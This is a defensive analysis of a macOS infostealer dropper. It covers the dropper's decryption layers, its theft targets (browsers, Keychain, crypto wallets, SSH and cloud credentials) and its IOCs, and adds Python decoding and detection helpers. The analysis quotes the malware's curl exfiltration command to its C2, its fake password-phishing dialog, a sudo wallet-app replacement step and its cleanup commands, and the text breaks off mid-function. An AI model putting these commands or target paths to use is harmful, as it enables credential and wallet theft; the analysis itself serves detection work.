Tearing Apart a Multi-Layer macOS Infostealer Dropper
Full static analysis of a macOS ARM64 infostealer dropper that uses custom encoding, NEON multiply chains, and runtime key derivation to decrypt a 114KB AppleScript payload targeting browser credentials, Keychain, crypto wallets, Apple Notes, and more.

Executive Summary
The sample is a macOS Mach-O Universal binary (x86_64 + ARM64) that serves as a multi-layer encrypted dropper for a 114KB obfuscated AppleScript infostealer. The binary employs six distinct encryption layers -- including a custom hex encoding alphabet, ARM NEON multiply-accumulate chains, runtime key derivation from an environment check, and a hash-table-based substitution cipher -- to resist static analysis.
Once decrypted, the AppleScript payload steals browser credentials and cookies from all major browsers, targets ~280 cryptocurrency wallet extensions by ID, exfiltrates the macOS Keychain, harvests Apple Notes, social-engineers the user's macOS password via a fake dialog, stages everything under /tmp/, and uploads to a C2 server at mpasvw[.]com / 92.246.136[.]14. It installs persistence via a LaunchDaemon masquerading as com.apple.accountsd.helper.
Analysis was conducted statically using Ghidra for disassembly and Unicorn Engine for emulating the decryption routines.
Quick-Reference IOCs
If you see any of the following on a macOS endpoint, assume compromise and isolate immediately:
| IOC | Type | What It Means |
|---|---|---|
| 92.246.136[.]14 | IP | C2 server - active exfiltration endpoint. If you see outbound HTTP POST traffic to this IP, stolen data is being uploaded. |
| mpasvw[.]com | Domain | Primary exfiltration domain. HTTPS POST with custom headers (BuildID, user, cl). Block and sinkhole. |
| aforvm[.]com | Domain | C2 domain for second-stage binary download (https://aforvm[.]com/zxc/kito). Used by the persistence installer to fetch the backdoor binary. Not used for data exfiltration. |
| com.apple.accountsd.helper | LaunchDaemon | Persistence mechanism masquerading as Apple's accountsd. Real Apple daemons don't use this label. Presence indicates a backdoor is installed and will survive reboot. |
| ~/Library/Application Support/.com.apple.accountsd/ | Directory | Bot installation directory. Contains .auth (stolen password), .cfg (config), .service (bot binary). Hidden directory using Apple naming convention. |
| /tmp/<5-digit-random>/ | Directory | Active staging directory. Contains FileGrabber/ subdirectory with stolen browser data, SSH keys, crypto wallets, Notes. pwd file contains the user's macOS password in plaintext. |
| /tmp/out.zip | File | Archived stolen data ready for exfiltration. If this exists, data theft is complete and upload is imminent or in progress. |
| osascript with >100KB -e argument | Process | The infostealer payload being executed. Normal osascript invocations use short scripts or file paths, not 114KB inline arguments. |
| dscl . authonly invoked by osascript | Process | Password validation -- the malware is testing a stolen or social-engineered password against the local account. |
| curl -X POST with -H "BuildID:" | Process | Data exfiltration in progress. The custom header is unique to this malware family. |
| pkill Terminal | Process | Post-execution cleanup. The malware kills Terminal to hide evidence. If this appears without user action, the payload has already run to completion. |
Binary Metadata
| Property | Value |
|---|---|
| SHA256 | 13185b0ed3b5032ed4c92f73ea100188af73d46e84a0a2b84055e2f2d3e3b6af |
| Format | Mach-O Universal (x86_64 + ARM64) |
| Total Size | 11,497,832 bytes (11 MB) |
| ARM64 Slice | 5,652,488 bytes |
| Code Section | 1.1 MB (__text) |
| Encrypted Data | 4.3 MB (__const) |
| Functions | 59 (21 user-defined) |
| Compiler | Clang/LLVM (C++ with libc++) |
| Imports | fork, pipe, dup2, execl, execvp, write, waitpid, bzero |
The binary's import table immediately reveals its intent: pipe-based process execution with memory wiping.
Dropper Architecture
Function Map
All 21 user-defined functions were identified and renamed in Ghidra:
| Address | Name | Role |
|---|---|---|
| 0x100111fc4 | entry | Entry point |
| 0x100111fd8 | main_orchestrator | Decryption + execution pipeline |
| 0x100000d70 | byte_vector_insert | Build encrypted byte arrays from __const |
| 0x100000f94 | int_vector_insert | Build encryption key integer arrays |
| 0x1000011e0 | alloc_zeroed_string | Allocate zeroed std::string buffer |
| 0x10000126c | exec_shell_command | fork/pipe/execvp /bin/sh -s |
| 0x100001984 | custom_hex_decode | Hex decode with custom 16-char alphabet |
| 0x1000013e4 | substitution_cipher | Hash-table position-based substitution |
| 0x10005a388 | generate_initial_payload | Initial command generator (~360 KB code) |
| 0x100044be0 | generate_payload_fragment1 | Shell script fragment 1 (~90 KB code) |
| 0x10005ce58 | generate_payload_fragment2 | Shell script fragment 2 (~370 KB code) |
| 0x100025c74 | generate_payload_fragment3 | Shell script fragment 3 (~125 KB code) |
| 0x1000c8554 | generate_payload_fragment4 | Shell script fragment 4 (~290 KB code) |
| 0x100001a84 | generate_payload_fragment5 | Shell script fragment 5 |
Six additional functions (check_string_integrity, compute_custom_hash, copy_string_bytewise, and three decryption variants) are compiled into the binary but never called -- likely dead code from a shared library or deliberate decoys.
Custom Hex Encoding
The binary uses a non-standard 16-character alphabet for hex encoding, stored as a 256-byte lookup table at 0x100113490:
| Nibble | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | A | B | C | D | E | F |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Char | C | Z | m | B | J | f | x | M | E | e | r | v | u | A | F | I |
This defeats pattern matching for standard hex-encoded strings and evades YARA rules targeting conventional encoding.
Decryption Pipeline (6 Phases)
Phase 1: Key Material Construction
The main_orchestrator loads hardcoded constants from the __const section into three arrays:
- Byte array (128 bytes): Built via 2 calls to byte_vector_insert
- Int array 1 (128 x 32-bit): Built via 3 calls to int_vector_insert
- Int array 2 (128 x 32-bit): Built via 2 calls to int_vector_insert
These feed into an ARM NEON multiply-accumulate chain: for each position, the integer key is raised to the 32nd power modulo 2^32 across four parallel accumulators, then the results are cross-multiplied using NEON ext (element extract) to produce a single transformation byte.
The output is a 128-byte substitution cipher key consisting entirely of the 16 custom hex alphabet characters.
Phase 2: Initial Command Decryption + Execution
generate_initial_payload() -- a massive function (10,959 bytes of code) making ~122 calls to byte_vector_insert and ~110 to int_vector_insert -- assembles encrypted data from __const and applies an arithmetic transformation:
output[i] = ((mid - lo) - (hi ^ ciphertext[i])) ^ lo
where: lo = val & 0xFF, mid = (val>>8) & 0xFF, hi = (val>>16) & 0xFF
(each clamped to 1 if zero)
- custom_hex_decode() converts the result from the custom alphabet to raw bytes
- substitution_cipher() transforms it using the Phase 1 key
- exec_shell_command() executes the result via fork/pipe/execvp /bin/sh -s
The initial command (2,906 bytes) is an obfuscated AppleScript executed via osascript -e that performs an environment check. Its exit code seeds all subsequent decryption.
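The two Phase 2 unwrapping steps that the write-up specifies exactly, the per-byte arithmetic transformation and the custom-alphabet hex decode, are shown below as an added analyst-side re-implementation; this is not code from the sample or from the author's tooling. The alphabet is the one tabulated under "Custom Hex Encoding". Two details are assumptions, since the write-up does not spell them out: one 32-bit key word is consumed per ciphertext byte, and the subtraction wraps modulo 256 as ARM64 byte arithmetic would. The substitution cipher that follows in the binary is not modelled.

```python
"""Added re-implementation of the Phase 2 unwrapping steps (arithmetic
transform + custom hex decode). Not code from the sample or the analysis."""

# Nibble -> character, reconstructed from the 256-byte lookup table described
# in the "Custom Hex Encoding" section (index = nibble value).
CUSTOM_ALPHABET = "CZmBJfxMEervuAFI"
CHAR_TO_NIBBLE = {ch: i for i, ch in enumerate(CUSTOM_ALPHABET)}


def split_key_bytes(val):
    """lo/mid/hi bytes of a 32-bit key word, each clamped to 1 if zero."""
    lo = (val & 0xFF) or 1
    mid = ((val >> 8) & 0xFF) or 1
    hi = ((val >> 16) & 0xFF) or 1
    return lo, mid, hi


def arithmetic_untransform(ciphertext, key_words):
    """output[i] = ((mid - lo) - (hi ^ ciphertext[i])) ^ lo, per byte.

    Assumption: one key word per ciphertext byte; subtraction wraps mod 256.
    """
    if len(key_words) < len(ciphertext):
        raise ValueError("need at least one key word per ciphertext byte")
    out = bytearray()
    for c, val in zip(ciphertext, key_words):
        lo, mid, hi = split_key_bytes(val)
        out.append((((mid - lo) - (hi ^ c)) & 0xFF) ^ lo)
    return bytes(out)


def custom_hex_decode(text):
    """Decode a string in the custom alphabet back to raw bytes.

    Rejects odd lengths and any character outside the alphabet; that same
    membership check is what validates candidate XOR keys in later phases.
    """
    if len(text) % 2:
        raise ValueError("custom hex string has odd length")
    out = bytearray()
    for i in range(0, len(text), 2):
        try:
            out.append((CHAR_TO_NIBBLE[text[i]] << 4) | CHAR_TO_NIBBLE[text[i + 1]])
        except KeyError as exc:
            raise ValueError(f"character {exc} not in custom alphabet") from exc
    return bytes(out)


def custom_hex_encode(data):
    """Inverse of custom_hex_decode; only needed to build test vectors."""
    return "".join(CUSTOM_ALPHABET[b >> 4] + CUSTOM_ALPHABET[b & 0xF] for b in data)


def unwrap_phase2(ciphertext, key_words):
    """Arithmetic transform, then custom hex decode of the resulting text."""
    return custom_hex_decode(arithmetic_untransform(ciphertext, key_words).decode("ascii"))


if __name__ == "__main__":
    # Constructed vector: key words 0x010101 and ciphertext chosen so the
    # transform yields the custom-hex string "xIxv", i.e. the bytes b"ok".
    print(unwrap_phase2(bytes([0x86, 0xB9, 0x86, 0x88]), [0x010101] * 4))
```

If the arithmetic stage has been reversed correctly, every output byte lands in the 16-character alphabet; a single out-of-alphabet byte is the quickest sign that either the key words or the wrap-around assumption is wrong.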
Phase 3: XOR Key Derivation
The waitpid() return status from Phase 2 determines the master XOR key:
if (status & 0x7F) != 0: // killed by signal
key = 0x67 // fallback
else: // normal exit
exit_code = (status >> 8) & 0xFFFFFF
key = ((exit_code * 0xBDE) + 0x5AF) & 0xFF
For the expected exit code of 0: key = 0xAF. An incorrect exit code (sandbox, wrong OS version) produces the wrong key, rendering all subsequent decryption into garbage.
Phase 4: Fragment Decryption
Five payload generator functions -- each 90-370 KB of code containing hundreds of inlined constant loads -- produce hex-encoded data. Each generator has a unique arithmetic transformation (confirmed via ARM64 instruction analysis of their transformation tails):
| Fragment | Generator | XOR Key Variant | Verified |
|---|---|---|---|
| 1 | generate_payload_fragment1 | key (0xAF) | EOR + ORR chain |
| 2 | generate_payload_fragment2 | key + 0x43 (0xF2) | Multi-int-array |
| 3 | generate_payload_fragment3 | key + 0x86 (0x35) | EOR + ORR chain |
| 4 | generate_payload_fragment4 | key - 0x37 (0x78) | MADD + ORR + EOR |
| 5 | generate_payload_fragment5 | key + 0x0C (0xBB) | ORR + EOR + UBFM |
After hex-decode and XOR, each fragment produces valid custom hex characters -- confirming the XOR key 0xAF was identified correctly (100.0% valid across all 304,576 bytes).
Phase 5: Reassembly + Substitution Cipher
- All five XOR'd fragments are hex-decoded again (custom alphabet -> binary)
- An additional 60-byte segment is decoded from an arithmetic tuple table at 0x10054c320
- substitution_cipher() is applied using the Phase 1 key to produce the final plaintext
Phase 6: Pipe to Bash with Anti-Forensics
The decrypted script is piped to /bin/bash with a critical anti-forensics technique:
for each chunk (64-191 bytes):
XOR decrypt the chunk (with key 0xAF)
write(pipe_fd, chunk, chunk_size)
bzero(chunk, chunk_size) // wipe immediately
Between each write, the data is re-encrypted then selectively decrypted per chunk. At any point during execution, at most ~191 bytes of plaintext exist in memory.
A second exec_shell_command runs disown; pkill Terminal to hide the execution window.
Extraction via Emulation
The six payload generator functions are 90-370 KB each, containing hundreds of inlined constant loads. Five of six exceeded Ghidra's decompiler timeout and instruction limits. Rather than attempting manual ARM64 instruction tracing across ~1MB of transformation code, the payload was extracted by emulating the binary's own decryption routines using Unicorn Engine -- an ARM64 CPU emulator.
Why Emulation
The dropper's encryption is deeply layered: each generator has a unique arithmetic transformation, the substitution cipher uses a complex hash-table with position-dependent output, and the XOR key is derived at runtime. Reversing each layer independently proved impractical -- small errors in any layer cascade into garbage output. Emulating the binary's own code guarantees correct decryption without needing to understand every intermediate step.
Emulation Architecture
The approach used three emulation stages:
Stage 1 -- Generator Functions: Each of the six generator functions was emulated individually. The functions are pure data transformations: they load constants from the __const section, apply arithmetic, and return a std::string. External dependencies (operator_new, memcpy, memmove, bzero) were hooked with Python implementations operating within Unicorn's sandboxed memory. All six produced 100% valid custom hex output (~122 KB each), confirming correct emulation.
Stage 2 -- XOR Key Identification: With all generator outputs in hand, the XOR base key was identified by brute-forcing all 256 candidates. For each candidate, every byte of every fragment was XOR'd with its key variant, and the result was validated against the custom hex alphabet. Key 0xAF (corresponding to exit code 0) produced 100.0% valid hex across all 304,576 bytes. The next-best candidate scored 41%.
Stage 3 -- Full Pipeline: The main_orchestrator function was emulated end-to-end with:
- Generator calls intercepted and returning pre-computed outputs from Stage 1
- exec_shell_command returning waitpid status 0 (exit code 0, matching the key from Stage 2)
- All syscall stubs (fork, pipe, execl, execvp, write, dup2, close, waitpid, __exit) hard-blocked to prevent any process or I/O operations
The emulation ran ~24 million instructions across the orchestrator's decryption pipeline -- NEON multiply chain, XOR layers, hex decode, substitution cipher, fragment concatenation -- and stopped at the _pipe syscall stub. At that point, the fully decrypted 114,216-byte payload was read directly from the emulated stack and XOR-decrypted with key 0xAF.
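The Phase 3 key derivation, the Phase 4 per-fragment key variants, and the Stage 2 brute-force validation all hinge on the same fact: a correctly XOR'd fragment contains only custom-alphabet characters. The added example below, which is not code from the write-up or the sample, implements the three together. The key formula and the fragment offsets are taken from the text; the fragment data is constructed here by custom-hex-encoding a few short plaintexts and XOR'ing them with the expected variant keys, so the recovery routine has something to undo.

```python
"""Added example: Phase 3 key derivation, Phase 4 fragment key variants, and
the Stage 2 brute-force recovery of the base key. Not the analysis tooling."""

CUSTOM_ALPHABET = "CZmBJfxMEervuAFI"
VALID_CHARS = frozenset(CUSTOM_ALPHABET.encode("ascii"))

# Fragment number -> offset added to the base key (from the Phase 4 table).
FRAGMENT_OFFSETS = {1: 0x00, 2: 0x43, 3: 0x86, 4: -0x37, 5: 0x0C}


def xor_key_from_status(status):
    """Phase 3: derive the master XOR key from a raw waitpid() status word."""
    if status & 0x7F:                      # child killed by a signal
        return 0x67                        # fallback key
    exit_code = (status >> 8) & 0xFFFFFF   # normal exit: code is in bits 8..
    return ((exit_code * 0xBDE) + 0x5AF) & 0xFF


def fragment_key(base_key, fragment):
    """Phase 4: per-fragment variant of the base key, wrapped to one byte."""
    return (base_key + FRAGMENT_OFFSETS[fragment]) & 0xFF


def alphabet_score(data, key):
    """Fraction of bytes that land in the custom alphabet after XOR with key."""
    if not data:
        return 0.0
    return sum(1 for b in data if (b ^ key) in VALID_CHARS) / len(data)


def recover_base_key(fragments):
    """Stage 2: score all 256 base keys across every fragment (each XOR'd with
    its own variant) and return (best_key, fraction_of_valid_bytes)."""
    total = sum(len(f) for f in fragments.values())
    best_key, best_score = -1, -1.0
    for cand in range(256):
        hits = sum(
            1
            for num, data in fragments.items()
            for b in data
            if (b ^ fragment_key(cand, num)) in VALID_CHARS
        )
        score = hits / total
        if score > best_score:
            best_key, best_score = cand, score
    return best_key, best_score


def custom_hex_encode(data):
    return "".join(CUSTOM_ALPHABET[b >> 4] + CUSTOM_ALPHABET[b & 0xF] for b in data)


def build_sample_fragments(base_key=0xAF):
    """Constructed test data, not bytes from the real sample: encode a few
    plaintexts in the custom alphabet, then XOR each with its variant key."""
    plaintexts = {
        1: bytes(range(0x01, 0x100, 0x22)),  # 01 23 45 ... EF: every nibble value
        2: b"FileGrabber",
        3: b"/tmp/out.zip",
        4: b"display dialog",
        5: b"pkill Terminal",
    }
    return {
        n: bytes(b ^ fragment_key(base_key, n) for b in custom_hex_encode(p).encode("ascii"))
        for n, p in plaintexts.items()
    }


if __name__ == "__main__":
    print(hex(xor_key_from_status(0)))            # expected exit code 0 -> 0xaf
    print(recover_base_key(build_sample_fragments()))
```

Because XOR with any non-zero delta maps at least one alphabet character outside the alphabet, a fragment that exercises all sixteen characters has exactly one key that scores 100%; that is why the real data separated 0xAF from the runner-up so sharply.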
Payload Analysis: AppleScript Infostealer
The decrypted payload is a 114,216-byte (1,339-line) obfuscated AppleScript executed via osascript -e '...'. All operational strings are constructed at runtime via three arithmetic obfuscation functions that use character-code math on integer arrays.
String Obfuscation Functions
-- Subtraction: chr(a[i] - b[i])
on xhbgcyydmaj(a, b) ...
-- Addition: chr(a[i] + b[i])
on okkqzcmkurrg(a, b) ...
-- Subtraction with constant: chr(a[i] - c - b[i])
on llwlidonf(a, b, c) ...
Over 480 strings are constructed this way (variables hwyksoup0 through hwyksoup479), making the script completely opaque to static string scanning.
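An added deobfuscation helper for the three string-construction forms, not the write-up's own tooling: it locates each `set hwyksoupN to <fn>(...)` assignment, parses the integer lists, and applies the matching character-code arithmetic. The function names are the obfuscated ones quoted above; the three-line script it runs over is constructed for illustration, not an excerpt of the real payload.

```python
"""Added example: decode the payload's three arithmetic string-obfuscation
forms from script text. Not the author's tooling; sample script constructed."""
import re


def decode_subtract(a, b):
    """xhbgcyydmaj: chr(a[i] - b[i])"""
    return "".join(chr(x - y) for x, y in zip(a, b))


def decode_add(a, b):
    """okkqzcmkurrg: chr(a[i] + b[i])"""
    return "".join(chr(x + y) for x, y in zip(a, b))


def decode_subtract_const(a, b, c):
    """llwlidonf: chr(a[i] - c - b[i])"""
    return "".join(chr(x - c - y) for x, y in zip(a, b))


# One obfuscated assignment per line: set hwyksoupN to <fn>({...}, {...}[, c])
CALL_RE = re.compile(
    r"^\s*set\s+(?P<var>hwyksoup\d+)\s+to\s+"
    r"(?P<fn>xhbgcyydmaj|okkqzcmkurrg|llwlidonf)\((?P<args>.*)\)\s*$",
    re.MULTILINE,
)
LIST_RE = re.compile(r"\{([^{}]*)\}")


def parse_args(args):
    """Split '{..}, {..}, 5' into integer lists and trailing scalar constants."""
    lists = [[int(n) for n in re.findall(r"-?\d+", body)] for body in LIST_RE.findall(args)]
    trailing = args.rsplit("}", 1)[-1] if "}" in args else ""
    consts = [int(n) for n in re.findall(r"-?\d+", trailing)]
    return lists, consts


def decode_script(text):
    """Return {variable_name: decoded_string} for every recognised assignment."""
    decoded = {}
    for m in CALL_RE.finditer(text):
        lists, consts = parse_args(m["args"])
        if len(lists) < 2:
            continue  # not one of the two-array forms; leave it for manual review
        if m["fn"] == "llwlidonf" and consts:
            decoded[m["var"]] = decode_subtract_const(lists[0], lists[1], consts[0])
        elif m["fn"] == "okkqzcmkurrg":
            decoded[m["var"]] = decode_add(lists[0], lists[1])
        elif m["fn"] == "xhbgcyydmaj":
            decoded[m["var"]] = decode_subtract(lists[0], lists[1])
    return decoded


# Constructed sample in the payload's shape (values chosen to decode to
# recognisable strings; not lines from the real script).
SAMPLE_SCRIPT = """\
set hwyksoup0 to xhbgcyydmaj({77, 131, 141, 147, 155, 161, 185}, {10, 20, 30, 40, 50, 60, 70})
set hwyksoup1 to okkqzcmkurrg({99, 113, 96, 104}, {1, 2, 3, 4})
set hwyksoup2 to llwlidonf({53, 123, 117, 121}, {1, 2, 3, 4}, 5)
"""

if __name__ == "__main__":
    for var, value in decode_script(SAMPLE_SCRIPT).items():
        print(f"{var} = {value!r}")
```

Note that the checksum the annex's decodeSubtract computes with `mod 9999` never influences its return value, so a decoder can ignore it; matching on the function name plus the integer lists is sufficient.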
Stealing Capabilities
1. Browser Credentials & Cookies
Targets all major Chromium + Firefox browsers:
- Google Chrome, Brave, Microsoft Edge, Opera/Opera GX, Vivaldi, Arc, Firefox, Safari
- Steals: Login Data, Cookies, Web Data, History, Local State, Bookmarks, Form Values
- Iterates all browser profiles
- Uses cp -f to copy database files to staging
2. Cryptocurrency Wallet Extensions (~280 IDs)
The gaifltxslt property contains ~280 browser extension IDs targeting:
- MetaMask, Phantom, Coinbase Wallet, Trust Wallet, Exodus, Atomic Wallet
- Keplr, Terra Station, Solflare, Brave Wallet
- Many other DeFi, NFT, and crypto wallet extensions
- Password manager extensions
When a targeted extension is found (mutwyxdwgkws checks directory listing), its entire storage is recursively copied.
3. macOS Keychain
- Determines Keychain UUID directory via shell command
- Copies entire ~/Library/Keychains/<UUID>/ directory (contains login.keychain-db)
4. Apple Notes
- Accesses Notes app via AppleScript (tell application "Notes")
- Extracts creation date + body of every note across all accounts
- Copies NoteStore SQLite databases and media attachments (30MB cap)
5. Safari Data
- ~/Library/Cookies/Cookies.binarycookies
- ~/Library/Containers/com.apple.Safari/Data/Library/Cookies/
- ~/Library/Safari/Form Values (autofill data)
6. Desktop & Documents Files
- Scans Desktop and Documents folders
- Steals files matching target extensions (likely .txt, .pdf, .key, .pem, .wallet, .kdbx, .json, .env)
- 30MB total size cap
7. SSH Keys & Cloud Credentials
Decoded strings reveal theft of developer/DevOps secrets:
- SSH: Copies entire ~/.ssh/ directory to FileGrabber/ssh/
- AWS: ~/.aws/credentials and ~/.aws/config
- Google Cloud: ~/.config/gcloud/application_default_credentials.json and credentials.db
- Azure: Entire ~/.azure/ directory
- Docker: ~/.docker/config.json
- FileZilla: sitemanager.xml and recentservers.xml (FTP credentials)
8. Desktop Cryptocurrency Wallet Theft
Targets native wallet applications by directly copying wallet files:
- Electrum: ~/.electrum/wallets/
- Electrum-LTC: ~/.electrum-ltc/wallets/
- Electron Cash: ~/.electron-cash/wallets/
- Coinomi: Coinomi/wallets/
- Exodus: Exodus/ (full app data)
- Atomic Wallet: atomic/Local Storage/leveldb/
- Wasabi Wallet: ~/.walletwasabi/client/Wallets/
- Ledger Live: Ledger Live/storage
- Monero: Monero/wallets/
- Bitcoin Core: Bitcoin/wallets/
- Litecoin Core: Litecoin/wallets/
- Dash Core: DashCore/wallets/
- Dogecoin Core: Dogecoin/wallets/
- Trezor Suite: @trezor/suite-desktop/
- Sparrow: ~/.sparrow/wallets/
- Guarda: Guarda/
- Binance: Binance/app-store.json
- TonKeeper: @tonkeeper/desktop/config.json
9. Trojanized Desktop App Replacement
Three functions (webipcfdo, kewfxqic, nwjzgtalvo) target Ledger Wallet, Trezor Suite, and Exodus desktop apps:
- Downloads a trojanized replacement from the C2 (/zxc/app.zip, /zxc/apptwo.zip, /zxc/appex.zip)
- Uses the stolen sudo password: echo <password> | sudo -S rm -r /Applications/Ledger Wallet.app
- Extracts the trojanized app via ditto -x -k to /Applications/
- Sets permissions: chmod -R +x
- Tracks replacement via a .logged marker file
10. Messaging & Other Data
- Telegram: Telegram Desktop/tdata/ (session keys: key_datas, maps)
- Discord: Local Storage/leveldb/ (tokens)
- Apple Stickies: Containers/Stickies/Data/Library/Stickies/
- Shell History: ~/.zsh_history
- OpenVPN: OpenVPN Connect/profiles/
11. Password Social Engineering
-- First tries empty password via dscl
dscl . authonly <username> <password>
-- If fails, shows fake system dialog:
display dialog <prompt> default answer "" with icon caution
buttons {"OK"} default button "OK" with hidden answer with title "macOS"
- Displays a convincing macOS-styled password prompt
- Loops until the user enters a valid password (validated via dscl . authonly)
- Stores in <bot_dir>/.auth for persistence across runs
12. Malicious Browser Extension Injection
Three separate functions target Chrome, Brave, and Firefox:
- Create temporary browser profiles
- Install a malicious extension
- Launch the browser with the compromised profile
- The extension likely performs in-browser credential/cookie extraction
Persistence
Installs a LaunchDaemon masquerading as an Apple service:
| Component | Value |
|---|---|
| Label | com.apple.accountsd.helper |
| Plist Path | /Library/LaunchDaemons/com.apple.accountsd.helper.plist |
| Binary | ~/Library/Application Support/<dir>/<bot_binary> |
| Properties | RunAtLoad, KeepAlive |
The second-stage binary is downloaded from the C2 via curl -o <path> https://<c2>/zxc/kito.
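A defender-side check for the persistence pattern in the table, added here as an example rather than taken from the write-up: it parses LaunchDaemon plists with the standard-library plistlib and flags the combination of an Apple-style label, a program path outside Apple-owned locations (Apple's own daemons ship under /System/Library/LaunchDaemons and point at /System, /usr, /sbin or /bin), and RunAtLoad + KeepAlive. The plists it scans are constructed in a temporary directory from the values in the table; the bot directory name follows the Quick-Reference IOC table, and the user name "victim" is a placeholder.

```python
"""Added example: triage LaunchDaemon plists for the masquerading pattern
described above. Not part of the write-up; sample plists are constructed."""
import plistlib
import tempfile
from pathlib import Path

# Where programs launched by genuine Apple daemons live.
APPLE_PROGRAM_PREFIXES = ("/System/", "/usr/", "/sbin/", "/bin/", "/Library/Apple/")
# A system daemon should never run code out of a user's home directory.
USER_HOME_PREFIXES = ("~/", "/Users/")
KNOWN_IOC_LABEL = "com.apple.accountsd.helper"


def program_path(plist):
    """Program if set, else ProgramArguments[0], else empty string."""
    if plist.get("Program"):
        return str(plist["Program"])
    args = plist.get("ProgramArguments") or []
    return str(args[0]) if args else ""


def assess_daemon_plist(plist):
    """Return the list of reasons a daemon plist looks suspicious (empty = clean)."""
    reasons = []
    label = str(plist.get("Label", ""))
    prog = program_path(plist)
    if label == KNOWN_IOC_LABEL:
        reasons.append(f"label {label} is a known infostealer persistence IOC")
    if label.startswith("com.apple.") and prog and not prog.startswith(APPLE_PROGRAM_PREFIXES):
        reasons.append(f"Apple-style label but program outside Apple locations: {prog}")
    if prog.startswith(USER_HOME_PREFIXES) and "/Library/Application Support/" in prog:
        reasons.append("daemon program lives in a user's Application Support directory")
    if reasons and plist.get("RunAtLoad") and plist.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive set: daemon is restarted if killed")
    return reasons


def scan_launch_daemons(directory):
    """Map each suspicious plist path under `directory` to its reasons."""
    findings = {}
    for path in sorted(Path(directory).glob("*.plist")):
        try:
            with path.open("rb") as fh:
                data = plistlib.load(fh)
        except Exception as exc:  # malformed plist is itself worth a look
            findings[str(path)] = [f"unparseable plist: {exc}"]
            continue
        reasons = assess_daemon_plist(data)
        if reasons:
            findings[str(path)] = reasons
    return findings


# Constructed from the persistence table; "victim" is a placeholder user name.
DEMO_MALICIOUS = {
    "Label": KNOWN_IOC_LABEL,
    "ProgramArguments": ["/Users/victim/Library/Application Support/.com.apple.accountsd/.service"],
    "RunAtLoad": True,
    "KeepAlive": True,
}
# Constructed benign third-party daemon for contrast (hypothetical vendor).
DEMO_BENIGN = {
    "Label": "com.example.updater",
    "Program": "/Library/Application Support/Example/updater",
    "RunAtLoad": True,
}


def build_demo_directory():
    """Write the two constructed plists into a fresh temp dir and return its path."""
    tmp = Path(tempfile.mkdtemp(prefix="launchdaemons-demo-"))
    for plist in (DEMO_MALICIOUS, DEMO_BENIGN):
        with (tmp / f"{plist['Label']}.plist").open("wb") as fh:
            plistlib.dump(plist, fh)
    return tmp


if __name__ == "__main__":
    for path, reasons in scan_launch_daemons(build_demo_directory()).items():
        print(path)
        for r in reasons:
            print("  -", r)
```

On a live host the same function would be pointed at /Library/LaunchDaemons; the Apple-label-outside-Apple-paths rule is the generalisable part, since the label itself will change between builds.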
Data Staging & Exfiltration
Staging:
- Creates /tmp/<random_5_digit>/ directory
- Organizes stolen data into subdirectories (FileGrabber/, browser-specific dirs)
- Archives with zip or ditto to /tmp/out.zip
Exfiltration:
curl --connect-timeout 120 --max-time 300 -X POST \
-H "user: <macOS_username>" \
-H "cl: <client_id>" \
-H "BuildID: 0" \
-H "cl: 1OVqyOU/n3-4zKVSjFsNK88S2buJzuW3rNaXRCJ1l4Q=" \
-H "cn: <chunk_number>" \
-F "file=@/tmp/out.zip" \
https://mpasvw[.]com/<path>
- Files >25MB are split and uploaded in numbered chunks
- 3 retry attempts with 10-15 second delays
- Falls back to http://92.246.136[.]14/contact if primary fails
Cleanup
disown; pkill Terminal
Kills the Terminal window to hide evidence of execution.
Indicators of Compromise
Network IOCs
| Type | Value | Description |
|---|---|---|
| C2 Domain | mpasvw[.]com | Primary exfiltration endpoint |
| C2 Domain | aforvm[.]com | Build ID / bot identifier |
| C2 IP | 92.246.136[.]14 | Fallback C2 (plain HTTP) |
| URL Path | /contact | Upload endpoint |
| URL Path | /zxc/kito | Second-stage binary download |
File IOCs
| Type | Value | Description |
|---|---|---|
| SHA256 | 13185b0ed3b5032ed4c92f73ea100188af73d46e84a0a2b84055e2f2d3e3b6af | Dropper binary |
| File | com.apple.accountsd.helper.plist | Persistence plist |
| File | .auth in Application Support | Stolen macOS password |
| File | .cfg in Application Support | Bot configuration |
| File | .service in Application Support | Bot binary |
| File | /tmp/out.zip | Archived stolen data |
| File | /tmp/<5_digits>/pwd | Password staged for exfil |
| File | /tmp/<5_digits>/FileGrabber/ | Stolen files staging |
Behavioral IOCs
| Indicator | Description |
|---|---|
| osascript -e with >100KB argument | AppleScript payload execution |
| osascript reading Cookies.binarycookies | Cookie theft |
| osascript accessing ~/Library/Keychains/ | Keychain theft |
| osascript using display dialog + hidden answer | Password phishing |
| osascript running dscl . authonly | Password validation |
| curl -X POST with -H "BuildID:" header | Data exfiltration |
| pkill Terminal | Post-execution cleanup |
| Mach-O binary piping data to /bin/bash via fork/pipe | Dropper execution pattern |
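The process-level rows of the table can be expressed as a small matcher over process-start events, shown here as an added example that is not part of the write-up. The event fields (executable name, full command line, parent name) are an assumed minimal schema rather than any particular EDR's; the events it runs over are constructed to exercise each rule plus two benign cases, with the defanged C2 domain from the page and a placeholder user name.

```python
"""Added example: match the behavioural IOCs above against process events.
Event schema and sample events are constructed, not from any EDR product."""
import shlex
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    name: str      # base name of the executable
    cmdline: str   # full command line
    parent: str    # base name of the parent process


# Parents from which a bash child is expected; anything else merits triage.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "zsh", "bash", "sh", "login"}


def match_behavioural_iocs(ev):
    """Return the list of behavioural indicators this event matches."""
    try:
        argv = shlex.split(ev.cmdline)
    except ValueError:           # unbalanced quotes: fall back to whitespace split
        argv = ev.cmdline.split()
    hits = []
    if ev.name == "osascript":
        if "-e" in argv and len(ev.cmdline) > 100_000:
            hits.append("osascript -e with >100KB inline script")
        if "display dialog" in ev.cmdline and "hidden answer" in ev.cmdline:
            hits.append("osascript password prompt (display dialog ... with hidden answer)")
    if ev.name == "dscl" and argv[1:3] == [".", "authonly"] and ev.parent == "osascript":
        hits.append("dscl . authonly launched by osascript (password validation)")
    if ev.name == "curl" and "-X" in argv and "POST" in argv \
            and any(a.startswith("BuildID:") for a in argv):
        hits.append("curl POST carrying BuildID header (exfiltration)")
    if ev.name == "pkill" and "Terminal" in argv:
        hits.append("pkill Terminal (post-execution cleanup)")
    if ev.name == "bash" and ev.parent not in INTERACTIVE_PARENTS:
        hits.append("bash spawned by non-interactive parent (dropper pattern, low fidelity)")
    return hits


def triage(events):
    """Return [(index, hits)] for every event that matched at least one rule."""
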